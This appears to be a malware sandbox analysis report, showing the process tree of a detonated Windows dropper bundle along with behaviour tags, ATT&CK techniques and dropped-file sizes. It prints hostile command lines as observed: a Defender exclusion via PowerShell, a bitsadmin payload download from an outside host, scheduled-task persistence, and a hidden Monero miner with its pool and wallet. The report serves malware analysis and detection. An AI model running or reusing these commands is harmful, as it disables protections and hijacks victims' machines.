C:\Users\Admin\Documents\XGIaWpglKnGrcb9Ky72xVKdq.exe"C:\Users\Admin\Documents\XGIaWpglKnGrcb9Ky72xVKdq.exe"12⤵
-
-
C:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exe"C:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exe"12⤵
-
C:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exeC:\Users\Admin\Documents\pGbd1hf97F_pVDyyTomaTFF_.exe13⤵
-
-
-
C:\Users\Admin\Documents\JSmKa8DI8JMGrmjM9GDwzbiL.exe"C:\Users\Admin\Documents\JSmKa8DI8JMGrmjM9GDwzbiL.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7288 -s 29613⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\cXjqbqDsxobbnfGNMq4eCR7G.exe"C:\Users\Admin\Documents\cXjqbqDsxobbnfGNMq4eCR7G.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 30413⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run13⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\09036c5a-5416-4218-9c41-62a158892109\test.bat"14⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe" -Force13⤵
-
-
C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"C:\Users\Admin\Documents\f7Y_tKFMjBvTWC3_zZv4h_Ey.exe"13⤵
-
-
-
C:\Users\Admin\Documents\FZa2WmJFecjCd4DIyiwISrVd.exe"C:\Users\Admin\Documents\FZa2WmJFecjCd4DIyiwISrVd.exe"12⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"13⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 28413⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exe"C:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exe"12⤵
-
C:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exeC:\Users\Admin\Documents\ZVjbeWwgXBzFqwTvqVH_m8s6.exe13⤵
-
-
-
C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"12⤵
-
C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"C:\Users\Admin\Documents\YaqwWv0wVoGoaS2bipa7aQoE.exe"13⤵
-
-
-
C:\Users\Admin\Documents\64ze0BJTdebWfVXLANzzExSb.exe"C:\Users\Admin\Documents\64ze0BJTdebWfVXLANzzExSb.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K7H3V.tmp\64ze0BJTdebWfVXLANzzExSb.tmp"C:\Users\Admin\AppData\Local\Temp\is-K7H3V.tmp\64ze0BJTdebWfVXLANzzExSb.tmp" /SL5="$20514,138429,56832,C:\Users\Admin\Documents\64ze0BJTdebWfVXLANzzExSb.exe"13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GG83B.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GG83B.tmp\Setup.exe" /Verysilent14⤵
-
-
-
-
C:\Users\Admin\Documents\bfb26UMp0McglsIpr8HayUI3.exe"C:\Users\Admin\Documents\bfb26UMp0McglsIpr8HayUI3.exe"12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc88A6.tmp\tempfile.ps1"13⤵
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z13⤵
- Download via BitsAdmin
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pdWcKnymJD9UreYa -y x C:\zip.7z -o"C:\Program Files\temp_files\"13⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yngdyedj.ag5\askinstall52.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\yngdyedj.ag5\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\yngdyedj.ag5\askinstall52.exe11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 164812⤵
- Program crash
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y1yedw1h.z4h\63c02b4cb20e1de8569175aa65df628a.exe & exit10⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f1yjgrmu.s3r\gcleaner.exe /mixfive & exit10⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zss5kruo.0f0\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\zss5kruo.0f0\installer.exeC:\Users\Admin\AppData\Local\Temp\zss5kruo.0f0\installer.exe /qn CAMPAIGN=65411⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxtznrid.i0s\app.exe /8-2222 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\oxtznrid.i0s\app.exeC:\Users\Admin\AppData\Local\Temp\oxtznrid.i0s\app.exe /8-222211⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 240 -s 24012⤵
- Program crash
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2367⤵
- Program crash
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'8⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\Services.exe"C:\Users\Admin\AppData\Roaming\Services.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Roaming\Services.exe"'9⤵
- Creates scheduled task(s)
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-asia1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --nicehash --tls --cinit-stealth8⤵
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"6⤵
-
C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhangfei.exe" -a7⤵
-
-
-
-
-
-
C:\Users\Admin\Documents\_0_9LvHWXMJdm_i5kN35w66W.exe"C:\Users\Admin\Documents\_0_9LvHWXMJdm_i5kN35w66W.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\4071221.exe"C:\Users\Admin\AppData\Roaming\4071221.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6084 -s 21365⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\4411936.exe"C:\Users\Admin\AppData\Roaming\4411936.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\5642277.exe"C:\Users\Admin\AppData\Roaming\5642277.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5642277.exe"C:\Users\Admin\AppData\Roaming\5642277.exe"5⤵
-
-
-
-
C:\Users\Admin\Documents\UnL57BIFzdiV2uzSGYBM8OE1.exe"C:\Users\Admin\Documents\UnL57BIFzdiV2uzSGYBM8OE1.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 2364⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md9_1sjm.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4584 -s 4563⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4584 -ip 45841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4360 -ip 43601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv R3q930x020WnyfI9gsy3Ow.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1012 -ip 10121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5464 -ip 54641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5548 -ip 55481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5524 -ip 55241⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5648 -ip 56481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5996 -ip 59961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2232 -ip 22321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5696 -ip 56961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5436 -ip 54361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4952 -ip 49521⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 4563⤵
- Program crash
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 7096 -ip 70961⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 616 -p 6084 -ip 60841⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 680 -ip 6801⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 4F83E446F061F656826854CCC2E91C3C C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A126DF12D614725717D315ED7D5F71D92⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 39D255D6020F6183FB121F60E80EE6D1 C2⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"4⤵
-
-
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 540 -p 5412 -ip 54121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6716 -ip 67161⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 6708 -ip 67081⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5492 -ip 54921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 240 -ip 2401⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 524 -p 7000 -ip 70001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7280 -ip 72801⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1888 -ip 18881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 7288 -ip 72881⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6948 -ip 69481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3804 -ip 38041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 7324 -ip 73241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 1548 -ip 15481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 5440 -ip 54401⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6564 -s 4562⤵
- Program crash
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6564 -ip 65641⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7256 -ip 72561⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 6940 -ip 69401⤵
-
C:\Program Files (x86)\Windows Media Player\wmplayer.exe"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding1⤵
-
C:\Windows\SysWOW64\unregmp2.exe"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon2⤵
-
C:\Windows\system32\unregmp2.exe"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT3⤵
-
-
-
C:\Program Files (x86)\Windows Media Player\setup_wm.exe"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Play -Embedding2⤵
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe"1⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3954055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
BITS Jobs
1Disabling Security Tools
4Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
12KB
-
Filesize
8KB
-
Filesize
1020KB
-
Filesize
1.3MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
828KB
-
Filesize
440KB
-
Filesize
2.5MB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
112KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
9.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
444KB
-
Filesize
828KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.7MB
-
Filesize
588KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
188KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
84KB
-
Filesize
628KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.6MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
36KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
436KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB